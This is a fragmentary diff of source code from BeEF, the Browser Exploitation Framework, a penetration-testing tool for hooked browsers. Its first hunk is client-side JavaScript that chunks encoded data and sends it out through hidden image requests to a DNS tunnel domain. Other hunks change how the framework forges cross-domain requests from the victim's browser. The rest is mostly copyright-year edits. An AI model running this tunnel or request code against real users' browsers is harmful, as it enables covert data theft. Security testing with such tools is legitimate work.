+        beef.debug("max_data_segment_length: " + max_data_segment_length);
-		segments = encoded_message.chunk(max_segment_length)
+
-		for (seq=1; seq<=segments.length; seq++) {
+        var dom = document.createElement('b');
-			// send segment
+
-			sendQuery(msgId+"."+seq+"."+segments.length+"."+xor_key+segments[seq-1]+"."+domain);
+        String.prototype.chunk = function(n) {
-		}
+            if (typeof n=='undefined') n=100;
            return this.match(RegExp('.{1,'+n+'}','g'));
        };
        var sendQuery = function(query) {
            var img = new Image;
            //img.src = "http://"+query;
            img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
            img.onload = function() { dom.removeChild(this); }
            img.onerror = function() { dom.removeChild(this); }
            dom.appendChild(img);
            //experimental
            //setTimeout(function(){dom.removeChild(img)},1000);
        };
        var segments = encodedData.chunk(max_data_segment_length);
        var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
        beef.debug(segments.length);
        for (var seq=1; seq<=segments.length; seq++) {
            sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
        }
 		// callback - returns the number of queries sent
 		if (!!callback) callback(segments.length);
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -21,8 +21,9 @@ beef.net.requester = {
 	send: function(requests_array) {
        for(var i=0; i<requests_array.length; i++){
            request = requests_array[i];
-
+            if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
-            beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+            beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
            beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
                                       function(res, requestid) { beef.net.send('/requester', requestid, {
                                           response_data: res.response_body,
                                           response_status_code: res.status_code,
--- a/Show More
+++ b/Show More
		`@@ -1,2 +0,0 @@`
			`# Reference for old (<1.2) versions of BeEF Live`
			`bash /opt/beef/liveCD/BeEFLive.sh`
		`@@ -0,0 +1,2 @@`
							`Move here the ARE rule files that you want to pre-load when BeEF starts.`
							`Make sure they are .json files (any other file extension is ignored).`